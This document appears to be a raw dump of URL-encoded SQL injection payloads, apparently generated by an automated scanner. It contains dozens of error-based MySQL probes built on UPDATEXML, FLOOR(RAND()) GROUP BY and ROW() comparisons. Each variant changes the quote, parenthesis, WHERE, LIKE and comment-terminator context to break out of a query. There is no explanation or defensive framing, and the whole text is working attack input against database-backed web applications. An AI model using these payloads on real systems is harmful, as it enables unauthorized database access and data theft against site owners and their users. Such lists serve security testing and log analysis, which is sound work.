foo%00%27%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%28%27IcSx%27%3D%27IcSx foo%00%27%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20AND%20%27XLxk%27%3D%27XLxk foo%27%29%20WHERE%203496%3D3496%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20--%20 foo%22%29%20WHERE%201475%3D1475%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20--%20 foo%29%20WHERE%201079%3D1079%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20--%20 foo%27%20WHERE%201879%3D1879%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20--%20 foo%22%20WHERE%205065%3D5065%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20--%20 foo%20WHERE%207364%3D7364%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20--%20 foo%27%7C%7C%28SELECT%20%27ytIW%27%20FROM%20DUAL%20WHERE%201921%3D1921%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27RTto%27%20WHERE%205493%3D5493%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20ghcu%20WHERE%202324%3D2324%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20%29%2B%27 foo%27%2B%28SELECT%20%27bWXd%27%20WHERE%203244%3D3244%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20OR%20UPDATEXML%283483%2CCONCAT%280x2e%2C0x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%283483%3D3483%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%29%2C7232%29%20%23 -2130%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29 -6202%27%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29 -8014%27%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29 -2044%22%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29 -5841%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%281710%3D1710 -8540%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%282668%3D2668 -3779%29%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%285270%3D5270 -7906%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29 -2452%27%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%27GKeh%27%3D%27GKeh -2903%27%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27oUap%27%3D%27oUap -6014%27%29%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27zVuK%27%3D%27zVuK -2225%27%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%27zFlE%27%3D%27zFlE -7378%27%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%27VdVF%27%20LIKE%20%27VdVF -6617%27%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27nQav%27%20LIKE%20%27nQav -1570%27%29%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27qvPk%27%20LIKE%20%27qvPk -9066%27%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%27WZlM%27%20LIKE%20%27WZlM -1587%22%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%22fFrQ%22%3D%22fFrQ -5128%22%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22ylac%22%3D%22ylac -2339%22%29%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22lJYs%22%3D%22lJYs -8321%22%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%22Tpzq%22%3D%22Tpzq -2813%22%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%22LFud%22%20LIKE%20%22LFud -5272%22%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22TGyX%22%20LIKE%20%22TGyX -2895%22%29%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22HXQC%22%20LIKE%20%22HXQC -2211%22%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%22cjSs%22%20LIKE%20%22cjSs -4715%25%27%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%27%25%27%3D%27 -5404%25%27%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27%25%27%3D%27 -5986%25%27%29%29%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27%25%27%3D%27 -1159%25%27%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%27%25%27%3D%27 -6859%00%27%29%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%28%27IrNV%27%3D%27IrNV -3035%00%27%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20AND%20%27LptF%27%3D%27LptF -9558%27%29%20WHERE%205935%3D5935%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20--%20 -2926%22%29%20WHERE%202265%3D2265%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20--%20 -8111%29%20WHERE%202856%3D2856%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20--%20 -7771%27%20WHERE%207405%3D7405%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20--%20 -5005%22%20WHERE%202426%3D2426%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20--%20 -4740%20WHERE%202938%3D2938%20OR%20ROW%288514%2C5329%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288514%3D8514%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%206399%20UNION%20SELECT%201319%20UNION%20SELECT%209313%20UNION%20SELECT%204997%29a%20GROUP%20BY%20x%29%20--%20 -6793%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2446%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3956%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7491%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9910%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7829%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4088%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7222%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3046%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9112%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3368%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8456%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8506%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4717%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7843%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7592%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6011%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -4746%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8936%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6247%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5769%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8132%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7274%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7674%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7129%25%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 